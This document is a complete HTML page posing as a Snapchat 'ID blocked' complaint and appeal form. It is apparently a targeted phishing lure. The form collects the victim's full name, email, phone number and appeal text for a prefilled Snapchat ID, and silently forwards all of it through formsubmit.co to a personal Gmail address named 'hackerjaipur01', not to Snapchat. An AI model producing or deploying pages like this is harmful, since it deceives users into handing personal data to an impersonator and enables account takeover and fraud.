
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Snapchat ID Block Complaint</title>
  <style>
    body {
      background-color: #111;
      color: #fff;
      font-family: Arial, sans-serif;
      padding: 20px;
    }
    h1 {
      color: #00ffff;
      text-align: center;
    }
    form {
      max-width: 500px;
      margin: auto;
      background: #1c1c1c;
      padding: 20px;
      border-radius: 10px;
    }
    label {
      margin-top: 15px;
      display: block;
    }
    input, textarea {
      width: 100%;
      padding: 10px;
      margin-top: 5px;
      border-radius: 5px;
      border: none;
      background-color: #2a2a2a;
      color: white;
    }
    button {
      margin-top: 20px;
      width: 100%;
      padding: 10px;
      background-color: #00ffff;
      color: black;
      border: none;
      font-weight: bold;
      border-radius: 5px;
      cursor: pointer;
    }
    button:hover {
      background-color: #00cccc;
    }
  </style>
</head>
<body>
  <h1>Snapchat ID Blocked Complaint</h1>
  <form action="https://formsubmit.co/hackerjaipur01@gmail.com" method="POST">
    <label for="snapchatId">Blocked Snapchat ID:</label>
    <input type="text" name="snapchatId" value="aagarwal9162" readonly>
    <label for="name">Your Full Name:</label>
    <input type="text" name="name" required>
    <label for="email">Your Email ID (to receive a copy):</label>
    <input type="email" name="email" required>
    <label for="phone">Your Contact Number:</label>
    <input type="text" name="phone">
    <label for="reason">Why do you think your ID was blocked?</label>
    <textarea name="reason" rows="4" placeholder="Write your explanation here..." required></textarea>
    <label for="appeal">Why should your ID be unblocked?</label>
    <textarea name="appeal" rows="4" placeholder="Write your appeal message..." required></textarea>
    <input type="hidden" name="_autoresponse" value="Thank you for submitting your Snapchat complaint. We will review it and get back to you soon.">
    <input type="hidden" name="_next" value="https://thankyou-page.com">
    <input type="text" name="_honey" style="display:none">
    <button type="submit">Submit Complaint</button>
  </form>
</body>
</html>
